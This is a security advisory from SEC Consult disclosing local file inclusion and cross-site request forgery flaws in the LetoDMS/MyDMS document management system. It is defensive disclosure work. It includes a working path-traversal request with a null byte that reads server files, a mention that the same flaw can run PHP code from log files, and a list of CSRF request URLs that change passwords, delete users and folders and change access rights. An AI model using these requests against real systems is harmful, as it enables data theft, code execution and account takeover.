Local file inclusion/execution and multiple Cross-Site-Request-Forgery vulnerabilities in LetoDMS

SEC Consult Security Advisory < 20100115-0 >


title: Local file inclusion/execution and multiple

Cross-Site-Request-Forgery vulnerabilities in

LetoDMS (formerly MyDMS)

products: LetoDMS (formerly MyDMS)

vulnerable version: LetoDMS (formerly MyDMS) <= 1.7.2

fixed version: n.a.

impact: critical

homepage: sourceforge.net/projects/mydms/

found: 2009-10-09

by: D. Fabian / SEC Consult / www.sec-consult.com

L. Weichselbaum / SEC Consult / www.sec-consult.com



Vendor description:


MyDMS is an open-source, web-based document management system (DMS)

written in PHP with a database backend. Originally coded by Markus

Westphal, MyDMS provides document meta-data, version control, security

and easy access to your documents.


source: sourceforge.net/projects/mydms/



Vulnerability overview/description:


The lang-parameter of /mydms/op/op.Login.php is vulnerable to file

inclusion. Through this vulnerability it is possible to read sensitive

data of the web server and to execute malicious PHP-code.


Furthermore there exist multiple Cross-Site-Request-Forgery

vulnerabilities which can be used to force a user/admin to execute

unwanted actions. Some of these actions are:

* Create new user with admin-privileges

* Change user credentials

* Delete a user/folder/document

* Change owner of a document

* Change access to a document

* Add keywords

* Add notifications

* Move folders



Proof of concept:


File inclusion/execution


If the guest-account is activated or you have a user to log in, it is

possible to include or execute files. The lang-parameter can be

modified in a malicious way. To terminate the predefined file-ending a

null-byte has to be appended after the file to be included. The

following GET-request can be used to e.g. receive the content of the

boot.ini-file on a server running Windows as operating system. This

vulnerability can also be used to execute malicious PHP-code (e.g.

PHP-code that has been written into log-files).



PoC request

GET /mydms/op/op.Login.php?login=guest&sesstheme=&lang=../../../../
boot.ini%00&sesstheme= HTTP/1.1



Cross-Site-Request-Forgery (CSRF)


The following requests can be used for CSRF-attacks:


- (only POST) /mydms/op/op.EditUserData.php?pwd=0wned&pwdconf=0wned
- /mydms/op/op.UsrMgr.php?userid=3&action=removeuser
- /mydms/out/out.RemoveVersion.php?documentid=1&version=1
- /mydms/op/op.RemoveFolder.php?folderid=2
- /mydms/op/op.DefaultKeywords.php?action=addcategory&name=test
- /mydms/op/op.GroupMgr.php?action=addgroup&name=test&comment=
- /mydms/op/op.FolderAccess.php?action=setowner&folderid=1&ownerid=3
- /mydms/op/op.FolderAccess.php?folderid=1&action=setdefault&mode=4
- /mydms/op/op.FolderAccess.php?folderid=1&action=addaccess&userid=3
- /mydms/op/op.FolderNotify.php?folderid=1&action=addnotify&userid=3
- /mydms/op/op.MoveFolder.php?folderid=4&targetid=1


It is assumed that there is more functionality vulnerable to




Vulnerable versions:



* <= 1.7.2


Vendor contact timeline:


2009-10-29: Contacting developers on SourceForge.Net and on

trilexnet.com by contact-form and the dev-forum.

2009-12-11: No response from developers so far.

2009-12-11: New attempt to contact developers.

2010-01-15: No response from developers.

2010-01-15: Release of the advisory.







Advisory URL:






SEC Consult Unternehmensberatung GmbH


Office Vienna

Mooslackengasse 17

A-1190 Vienna



Tel.: +43 / 1 / 890 30 43 - 0

Fax.: +43 / 1 / 890 30 43 - 25

Mail: research at sec-consult dot com



SEC Consult conducts periodical information security workshops on ISO

27001/BS 7799 in cooperation with BSI Management Systems. For more

information, please refer to www.sec-consult.com/academy_e.html


EOF L. Weichselbaum / @2010